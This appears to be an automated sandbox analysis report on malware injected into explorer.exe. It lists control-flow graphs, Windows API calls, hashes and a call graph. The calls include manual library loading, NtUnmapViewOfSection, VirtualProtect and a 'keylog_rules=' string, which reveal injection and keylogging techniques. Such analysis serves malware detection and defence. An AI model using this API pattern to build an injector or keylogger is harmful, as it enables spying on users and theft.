                                                                                                                            control_flow_graph 410 4712ae-4712bf 411 4713a6-4713ad 410->411 412 4712c5-4712c7 410->412 412->411 413 4712cd-4712cf 412->413 414 4712d4 call 4729bd 413->414 415 4712d9-4712fc lstrlen call 472a09 414->415 418 47136e-471377 call 4729eb 415->418 419 4712fe-471327 call 472841 RtlZeroMemory 415->419 426 47139d-4713a5 call 4729ae 418->426 427 471379-47137d 418->427 424 471353-471369 RtlMoveMemory call 472569 419->424 425 471329-47134f RtlMoveMemory call 472569 419->425 424->418 425->419 435 471351 425->435 426->411 431 47137f-471392 call 47255c PathMatchSpecA 427->431 437 471394-471397 431->437 438 47139b 431->438 435->418 437->431 439 471399 437->439 438->426 439->426
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 004729BD: VirtualAlloc.KERNEL32(00000000,00040744,00003000,00000040,004712D9,00000000,00000000,?,00000001), ref: 004729C7
                                                                                                                            • lstrlen.KERNEL32(00000000,00000000,00000000,?,00000001), ref: 004712DC
                                                                                                                              • Part of subcall function 00472A09: GetProcessHeap.KERNEL32(00000008,0000A000,004710BF), ref: 00472A0C
                                                                                                                              • Part of subcall function 00472A09: RtlAllocateHeap.NTDLL(00000000), ref: 00472A13
                                                                                                                            • PathMatchSpecA.SHLWAPI(?,00000000), ref: 0047138A
                                                                                                                              • Part of subcall function 00472841: lstrlen.KERNEL32(00000000,?,?,00000001,00000000,00471119,00000001), ref: 00472850
                                                                                                                              • Part of subcall function 00472841: lstrlen.KERNEL32(keylog_rules=,?,?,00000001,00000000,00471119,00000001), ref: 00472855
                                                                                                                            • RtlZeroMemory.NTDLL(00000000,00000104), ref: 00471316
                                                                                                                            • RtlMoveMemory.NTDLL(00000000,?,?), ref: 00471332
                                                                                                                              • Part of subcall function 00472569: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,0047136E), ref: 00472591
                                                                                                                              • Part of subcall function 00472569: RtlMoveMemory.NTDLL(00000FA4,00000000,00000000), ref: 0047259A
                                                                                                                            • RtlMoveMemory.NTDLL(00000000,?,?), ref: 0047135F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000012.00000002.4579461534.0000000000471000.00000040.80000000.00040000.00000000.sdmp, Offset: 00471000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_18_2_471000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Memorylstrlen$Move$Heap$AllocAllocateMatchPathProcessSpecVirtualZero
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2993730741-0
                                                                                                                            • Opcode ID: 10c7aaa37ea6af1b696c5ddd530c258339ae7b42b4567bc8cc1166b2de96381c
                                                                                                                            • Instruction ID: c811274904f31d9b13311614b4ffe6a3aa534a88d167d7e73ac7f0bce2f86a01
                                                                                                                            • Opcode Fuzzy Hash: 10c7aaa37ea6af1b696c5ddd530c258339ae7b42b4567bc8cc1166b2de96381c
                                                                                                                            • Instruction Fuzzy Hash: EA21D2707042019F9310EF2D89458BFB3D9AB84704B10853FFC4AD3752DB78DD498A6A
                                                                                                                            Function 00471581 Relevance: 7.6, APIs: 5, Instructions: 66stringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 004715A9
                                                                                                                            • lstrlenW.KERNEL32(00000000), ref: 004715C6
                                                                                                                            • lstrcatW.KERNEL32(00000000,00000000), ref: 004715DC
                                                                                                                            • lstrlenW.KERNEL32(00000000), ref: 00471600
                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0047161C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000012.00000002.4579461534.0000000000471000.00000040.80000000.00040000.00000000.sdmp, Offset: 00471000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_18_2_471000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Globallstrlen$LockUnlocklstrcat
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1114890469-0
                                                                                                                            • Opcode ID: 2399493a268d5c54a0d547dc761d5577a40dc859f74ccd151cffadc3b78c0020
                                                                                                                            • Instruction ID: 489620c0566b34ce9a8fe4c86dce780d147c746e10dafc0e22d00b542f504644
                                                                                                                            • Opcode Fuzzy Hash: 2399493a268d5c54a0d547dc761d5577a40dc859f74ccd151cffadc3b78c0020
                                                                                                                            • Instruction Fuzzy Hash: C4014832B000506B86282B7E6E885FF22AD9FC6315708C03BF40F93332DE6C8D02529C
                                                                                                                            Function 00471BBD Relevance: 6.1, APIs: 4, Instructions: 101libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlMoveMemory.NTDLL(?,?,?), ref: 00471BF4
                                                                                                                            • LoadLibraryA.KERNEL32(?,00475848,00000000,00000000,76232EE0,00000000,004719B6,?,?,?,00000001,?,00000000), ref: 00471C1C
                                                                                                                            • GetProcAddress.KERNEL32(00000000,-00000002), ref: 00471C49
                                                                                                                            • LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 00471C9A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000012.00000002.4579461534.0000000000471000.00000040.80000000.00040000.00000000.sdmp, Offset: 00471000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_18_2_471000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3827878703-0
                                                                                                                            • Opcode ID: 1183ffa5ee2a4e4eb9132999b78f8d34a0633f8ca8c389fbe67dc360b27ce6bb
                                                                                                                            • Instruction ID: e54e7f7f7e120955fa95f7628db52f00bb9e0ce31acc969b59eab95bbdffb60e
                                                                                                                            • Opcode Fuzzy Hash: 1183ffa5ee2a4e4eb9132999b78f8d34a0633f8ca8c389fbe67dc360b27ce6bb
                                                                                                                            • Instruction Fuzzy Hash: 7E31C071740211AFCB29CF6DC884BA6B7A8BF15305F14812EE84EC7310D739E845DBA8
                                                                                                                            Function 004726C9 Relevance: 6.0, APIs: 4, Instructions: 39COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • OpenProcess.KERNEL32(00000400,00000000,?,?,00000001,?,00000000,004711DD), ref: 004726DB
                                                                                                                            • IsWow64Process.KERNEL32(000000FF,?), ref: 004726ED
                                                                                                                            • IsWow64Process.KERNEL32(00000000,?), ref: 00472700
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00472716
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000012.00000002.4579461534.0000000000471000.00000040.80000000.00040000.00000000.sdmp, Offset: 00471000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_18_2_471000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$Wow64$CloseHandleOpen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 331459951-0
                                                                                                                            • Opcode ID: ee0f1da1aa11b798e81a9e115ede4063d819c18f01c4dbe8b90f95d10250b899
                                                                                                                            • Instruction ID: 558b16490ffb54153e39d30cad16443359143961ca309251796b5d52f0c4bbf2
                                                                                                                            • Opcode Fuzzy Hash: ee0f1da1aa11b798e81a9e115ede4063d819c18f01c4dbe8b90f95d10250b899
                                                                                                                            • Instruction Fuzzy Hash: 93F0B471802228FF9B14CFA49F488EFB7BCEF05356B10426BE908A3240D7744F40A6A9
                                                                                                                            Function 004717DC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31timeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00472A09: GetProcessHeap.KERNEL32(00000008,0000A000,004710BF), ref: 00472A0C
                                                                                                                              • Part of subcall function 00472A09: RtlAllocateHeap.NTDLL(00000000), ref: 00472A13
                                                                                                                            • GetLocalTime.KERNEL32(?,00000000), ref: 004717F3
                                                                                                                            • wsprintfW.USER32 ref: 0047181D
                                                                                                                            Strings
                                                                                                                            • [%02d.%02d.%d %02d:%02d:%02d], xrefs: 00471817
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000012.00000002.4579461534.0000000000471000.00000040.80000000.00040000.00000000.sdmp, Offset: 00471000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_18_2_471000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$AllocateLocalProcessTimewsprintf
                                                                                                                            • String ID: [%02d.%02d.%d %02d:%02d:%02d]
                                                                                                                            • API String ID: 377395780-613334611
                                                                                                                            • Opcode ID: cf4570bbc77d3d190220f2d36414867e1d03fa0a7faa8834430fc680cd2d4f71
                                                                                                                            • Instruction ID: a3888f7324a23b5431077a5d5f438143a4182e43adab6600a579f09d7d46ed57
                                                                                                                            • Opcode Fuzzy Hash: cf4570bbc77d3d190220f2d36414867e1d03fa0a7faa8834430fc680cd2d4f71
                                                                                                                            • Instruction Fuzzy Hash: 1FF03761900138BAC7145BD99D059FFB3FCEB0C702B00015BFA45E1180F57C5A90D3B9

                                                                                                                            Callgraph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            • Opacity -> Relevance
                                                                                                                            • Disassembly available
                                                                                                                            callgraph 0 Function_00AA25A8 25 Function_00AA2580 0->25 43 Function_00AA2768 0->43 75 Function_00AA18D0 0->75 1 Function_00AAB4A8 42 Function_00AAB46A 1->42 2 Function_00AA1CAC 3 Function_00AA20AC 18 Function_00AA1A88 3->18 4 Function_00AA2E2C 20 Function_00AA188C 4->20 50 Function_00AA1860 4->50 66 Function_00AA2DC0 4->66 5 Function_00AA31AC 5->0 9 Function_00AA1838 5->9 37 Function_00AA1B10 5->37 5->50 56 Function_00AA26F8 5->56 79 Function_00AA1D54 5->79 6 Function_00AA1822 7 Function_00AA27A0 8 Function_00AA1D24 10 Function_00AA1938 10->9 10->50 11 Function_00AA24B8 11->9 11->50 62 Function_00AA20F4 11->62 12 Function_00AAB2BE 12->1 13 Function_00AA19BC 14 Function_00AA2FBC 14->4 15 Function_00AA14B2 16 Function_00AAAAB0 17 Function_00AA1508 19 Function_00AA370C 19->5 19->9 19->19 48 Function_00AA1C6C 19->48 67 Function_00AA34C4 19->67 20->9 21 Function_00AA1F0C 22 Function_00AAAC8D 23 Function_00AA1000 24 Function_00AA1F00 26 Function_00AAAD00 27 Function_00AAA881 28 Function_00AAB007 29 Function_00AA1D04 30 Function_00AA2A04 32 Function_00AA2918 30->32 30->48 68 Function_00AA27C4 30->68 31 Function_00AA1405 33 Function_00AA1E9C 34 Function_00AA1E1C 34->9 35 Function_00AAAB9C 36 Function_00AA141D 38 Function_00AAB291 39 Function_00AA2D14 39->9 39->11 39->34 44 Function_00AA18E8 39->44 39->50 40 Function_00AA3394 40->9 40->18 40->33 40->44 40->50 57 Function_00AA1EF8 40->57 40->75 41 Function_00AAADEA 43->7 45 Function_00AA3068 45->4 45->9 45->10 45->48 45->50 46 Function_00AAA8E8 47 Function_00AA156C 49 Function_00AAAFE3 50->48 51 Function_00AA1560 52 Function_00AA2664 53 Function_00AA1EFA 54 Function_00AA1BF8 55 Function_00AA18F8 56->25 56->48 56->52 58 Function_00AA14F9 59 Function_00AA5579 60 Function_00AA1576 61 Function_00AAAFF6 62->3 62->9 62->13 62->20 62->21 62->50 62->55 73 Function_00AA1FDC 62->73 62->75 63 Function_00AAB148 64 Function_00AAABCF 65 Function_00AA1C4C 66->9 67->2 67->8 67->9 67->13 67->18 67->29 67->30 67->40 67->48 67->50 67->54 67->65 69 Function_00AAB15B 70 Function_00AA3158 71 Function_00AAB358 71->1 72 Function_00AAB2DF 73->9 73->55 74 Function_00AAAAD2 76 Function_00AAABD7 77 Function_00AA1254 78 Function_00AA14D4

                                                                                                                            Executed Functions

                                                                                                                            Function 00AA370C Relevance: 1.6, APIs: 1, Instructions: 75nativeCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 116 aa370c-aa371c call aa1c6c 119 aa3722-aa3754 call aa1838 116->119 120 aa37b0-aa37b5 116->120 124 aa3756-aa375b call aa1838 119->124 125 aa3785-aa37aa NtUnmapViewOfSection 119->125 127 aa3760-aa3779 124->127 129 aa37bc-aa37cb call aa34c4 125->129 130 aa37ac-aa37ae 125->130 127->125 135 aa37cd-aa37d0 call aa370c 129->135 136 aa37d5-aa37de 129->136 130->120 132 aa37b6-aa37bb call aa31ac 130->132 132->129 135->136
                                                                                                                            APIs
                                                                                                                            • NtUnmapViewOfSection.NTDLL ref: 00AA378C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.4579249904.0000000000AA1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_aa1000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: SectionUnmapView
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 498011366-0
                                                                                                                            • Opcode ID: dbf61e07686744f72196ae4154379358cd8380f5b457a8fa64264e9f57adb311
                                                                                                                            • Instruction ID: 051172b8067697a1eca0933bc269406de931c5048cc94f01f91583bd5e4d47a1
                                                                                                                            • Opcode Fuzzy Hash: dbf61e07686744f72196ae4154379358cd8380f5b457a8fa64264e9f57adb311
                                                                                                                            • Instruction Fuzzy Hash: 7311B2746019094BFF58FBB8989D27533E1EB1A312F54402AB815C72E2EF398A818700
                                                                                                                            Function 00AAB4A8 Relevance: 4.8, APIs: 3, Instructions: 252memorylibraryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 0 aab4a8-aab4ab 1 aab4b5-aab4b9 0->1 2 aab4bb-aab4c3 1->2 3 aab4c5 1->3 2->3 4 aab4ad-aab4b3 3->4 5 aab4c7 3->5 4->1 6 aab4ca-aab4d1 5->6 8 aab4dd 6->8 9 aab4d3-aab4db 6->9 8->6 10 aab4df-aab4e2 8->10 9->8 11 aab4f7-aab504 10->11 12 aab4e4-aab4f2 10->12 22 aab51e-aab52c call aab46a 11->22 23 aab506-aab508 11->23 13 aab52e-aab549 12->13 14 aab4f4-aab4f5 12->14 16 aab57a-aab57d 13->16 14->11 17 aab57f-aab580 16->17 18 aab582-aab589 16->18 20 aab561-aab565 17->20 21 aab58f-aab593 18->21 24 aab54b-aab54e 20->24 25 aab567-aab56a 20->25 26 aab5f0-aab5f9 21->26 27 aab595-aab5ae LoadLibraryA 21->27 22->1 28 aab50b-aab512 23->28 24->18 33 aab550 24->33 25->18 29 aab56c-aab570 25->29 30 aab5fc-aab605 26->30 32 aab5af-aab5b6 27->32 48 aab51c 28->48 49 aab514-aab51a 28->49 34 aab572-aab579 29->34 35 aab551-aab555 29->35 36 aab62a-aab67a VirtualProtect * 2 30->36 37 aab607-aab609 30->37 32->21 39 aab5b8 32->39 33->35 34->16 35->20 40 aab557-aab559 35->40 44 aab67e-aab683 36->44 42 aab60b-aab61a 37->42 43 aab61c-aab628 37->43 45 aab5ba-aab5c2 39->45 46 aab5c4-aab5cc 39->46 40->20 47 aab55b-aab55f 40->47 42->30 43->42 44->44 50 aab685-aab694 44->50 51 aab5ce-aab5da 45->51 46->51 47->20 47->25 48->22 48->28 49->48 54 aab5dc-aab5e3 51->54 55 aab5e5-aab5ef 51->55 54->32
                                                                                                                            APIs
                                                                                                                            • LoadLibraryA.KERNELBASE(?,?,?,?,?,?,?,?,7473604B), ref: 00AAB5A7
                                                                                                                            • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 00AAB651
                                                                                                                            • VirtualProtect.KERNELBASE ref: 00AAB66F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.4579249904.0000000000AAA000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AAA000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_aaa000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ProtectVirtual$LibraryLoad
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 895956442-0
                                                                                                                            • Opcode ID: 2ac08652e5940d8da138c1cef1dd6534290a638b515b67647dbd8ecab25afafd
                                                                                                                            • Instruction ID: 489849b5689ead08a026ee792af1f0160920f9d603f2e9ace04eec1bddc1df85
                                                                                                                            • Opcode Fuzzy Hash: 2ac08652e5940d8da138c1cef1dd6534290a638b515b67647dbd8ecab25afafd
                                                                                                                            • Instruction Fuzzy Hash: EA515B31B74A1E4BCB24AB789CD42F4B7D1F75B325B18062AC49BC32C7D769C84683A1
                                                                                                                            Function 00AA34C4 Relevance: 3.2, APIs: 2, Instructions: 195COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00AA1BF8: OpenFileMappingA.KERNEL32 ref: 00AA1C0F
                                                                                                                              • Part of subcall function 00AA1BF8: MapViewOfFile.KERNELBASE ref: 00AA1C2E
                                                                                                                            • SysFreeMap.PGOCR ref: 00AA36F7
                                                                                                                            • SleepEx.KERNELBASE ref: 00AA3701
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.4579249904.0000000000AA1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_aa1000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$FreeMappingOpenSleepView
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4205437007-0
                                                                                                                            • Opcode ID: b219c8272f255adf82644705b15b3be163a192963f27b66c12c2cdeb1fe9695d
                                                                                                                            • Instruction ID: d66d6cc551eaffb990e0ca7ac61f90c67ad2474d9389a1ba0c6e486f669ec878
                                                                                                                            • Opcode Fuzzy Hash: b219c8272f255adf82644705b15b3be163a192963f27b66c12c2cdeb1fe9695d
                                                                                                                            • Instruction Fuzzy Hash: D1518431218A089FDB19FF28D9997AB73E2EB96310F444619F45BC72E1DF38DA058781
                                                                                                                            Function 00AA1BF8 Relevance: 3.0, APIs: 2, Instructions: 40fileCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 113 aa1bf8-aa1c18 OpenFileMappingA 114 aa1c1a-aa1c38 MapViewOfFile 113->114 115 aa1c3b-aa1c48 113->115 114->115
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.4579249904.0000000000AA1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_aa1000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$MappingOpenView
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3439327939-0
                                                                                                                            • Opcode ID: 6967ddb8a23556e9d4b9c667e167efa50793072ee7ce98a3c93afcac9569559f
                                                                                                                            • Instruction ID: a08c69f5635d18ec052ff8f6aeebf9bf11abeb5654308294f6c17c05b86cbb7d
                                                                                                                            • Opcode Fuzzy Hash: 6967ddb8a23556e9d4b9c667e167efa50793072ee7ce98a3c93afcac9569559f
                                                                                                                            • Instruction Fuzzy Hash: 24F01234314F4D4FAB45EF7C9C9C136B7E1EBA8202B44857A985AC7165EF34C8458711